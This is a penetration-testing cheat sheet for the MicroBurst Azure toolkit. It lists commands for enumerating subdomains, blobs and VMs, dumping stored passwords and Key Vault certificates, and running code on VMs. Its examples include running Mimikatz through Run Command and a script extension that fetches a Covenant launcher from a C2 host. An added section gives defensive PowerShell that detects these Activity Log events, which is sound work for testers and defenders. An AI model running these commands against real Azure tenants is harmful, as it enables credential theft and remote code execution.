# MicroBurst

## MicroBurst

#### Domain Enumeration (passive):

Subdomain enum:

```
Invoke-EnumerateAzureSubDomains -Base CLIENT -Verbose
```

Blob enum:

```
Invoke-EnumerateAzureBlobs -Base CLIENT -BingAPIKey 00000000001234567899876543210123
```

#### Authenticate:

```
Connect-AzAccount
```

#### Credentials:

Gather Passwords:

```
Get-AzPasswords -Verbose
```

Cert:

```
Get-AzurePasswords -Keys N -AppServices N -Verbose

# Then execute the ps file: 
AuthenticateAs-XXXXX.ps1
```

Key Vaults:

```
Get-AzureKeyVaults-Automation -ExportCerts Y -Subscription "SUBSCRIPTION_NAME" -Verbose | ft -AutoSize
```

#### Virtual machines:

Enum:

```
Get-AzVM | Format-Table -Wrap -AutoSize -Property ResourceGroupName,Name,Location
Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
```

VM Extensions:

```
Get-AzureVMExtensionSettings
Get-AzureVMExtensionSettings | Export-CSV -Path C:\tmp\results.csv
```

Run commands:

```
Invoke-AzureRmVMRunCommand -ResourceGroupName VMResourceGroupName -VMName VMName -CommandId RunPowerShellScript -ScriptPath PathToYourScript

# mimikatz?
Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1

# Script extension (gather info from Get-AzureVMExtensionSettings):
Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension
# Cleanup: remove the extension from the same VM it was set on
Remove-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Name CovenantScriptExtension
```
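
From the defender's side, the Run Command and Custom Script Extension calls above each leave an entry in the Azure Activity Log. The following is an added example, not part of MicroBurst or the original page: it filters exported log records for those operations and marks an extension that is written and then deleted shortly afterwards. The record field names (`time`, `operationName`, `caller`, `resourceId`), the function name `Find-VmCodeExecutionEvent`, and the sample records are assumptions constructed for illustration.

```powershell
# Added example (not MicroBurst code). Operation names are Azure resource-provider operations;
# hashtable literals are case-insensitive, so upper-cased exports match as well.
$WatchedOperations = @{
    'Microsoft.Compute/virtualMachines/runCommand/action' = 'Run Command executed on VM'
    'Microsoft.Compute/virtualMachines/extensions/write'  = 'VM extension created or updated'
    'Microsoft.Compute/virtualMachines/extensions/delete' = 'VM extension removed'
}

function Find-VmCodeExecutionEvent {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $CleanupWindowMinutes = 60   # assumed threshold for "write, then quick delete"
    )
    # Keep only the watched operations and normalise them into flat findings.
    $hits = @(
        $Events | Where-Object { $WatchedOperations.ContainsKey([string]$_.operationName) } |
            ForEach-Object {
                [pscustomobject]@{
                    Time         = ([datetime]$_.time).ToUniversalTime()
                    Caller       = $_.caller
                    Operation    = [string]$_.operationName
                    Finding      = $WatchedOperations[[string]$_.operationName]
                    ResourceId   = $_.resourceId
                    QuickRemoval = $false
                }
            } | Sort-Object Time
    )
    # Mark an extension write whose extension is deleted again within the window.
    foreach ($w in ($hits | Where-Object { $_.Operation -like '*/extensions/write' })) {
        $removed = $hits | Where-Object {
            $_.Operation -like '*/extensions/delete' -and $_.ResourceId -ieq $w.ResourceId -and
            $_.Time -ge $w.Time -and ($_.Time - $w.Time).TotalMinutes -le $CleanupWindowMinutes
        }
        if ($removed) { $w.QuickRemoval = $true }
    }
    $hits
}

# Constructed sample records (simplified fields; subscription ID and callers are placeholders).
$sub = '/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups'
$sample = @"
[
 {"time":"2024-05-01T10:00:00Z","operationName":"Microsoft.Compute/virtualMachines/extensions/write","caller":"user@example.invalid","resourceId":"$sub/TESTER/providers/Microsoft.Compute/virtualMachines/CSETest/extensions/CovenantScriptExtension"},
 {"time":"2024-05-01T10:07:00Z","operationName":"Microsoft.Compute/virtualMachines/extensions/delete","caller":"user@example.invalid","resourceId":"$sub/TESTER/providers/Microsoft.Compute/virtualMachines/CSETest/extensions/CovenantScriptExtension"},
 {"time":"2024-05-01T11:30:00Z","operationName":"MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMAND/ACTION","caller":"user@example.invalid","resourceId":"$sub/TESTRESOURCES/providers/Microsoft.Compute/virtualMachines/Remote-Test"},
 {"time":"2024-05-01T12:00:00Z","operationName":"Microsoft.Compute/virtualMachines/read","caller":"ops@example.invalid","resourceId":"$sub/TESTER/providers/Microsoft.Compute/virtualMachines/CSETest"}
]
"@ | ConvertFrom-Json

Find-VmCodeExecutionEvent -Events $sample | Format-Table Time, Caller, Finding, QuickRemoval -AutoSize
```

To use it on real data, map the fields of your own Activity Log export onto the four assumed names before passing the records in.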

Triggering a webhook:

```
$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d"
$AccountInfo = @(@{RequestBody=@{Username="BlogDemoUser";Password="Password123"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
```
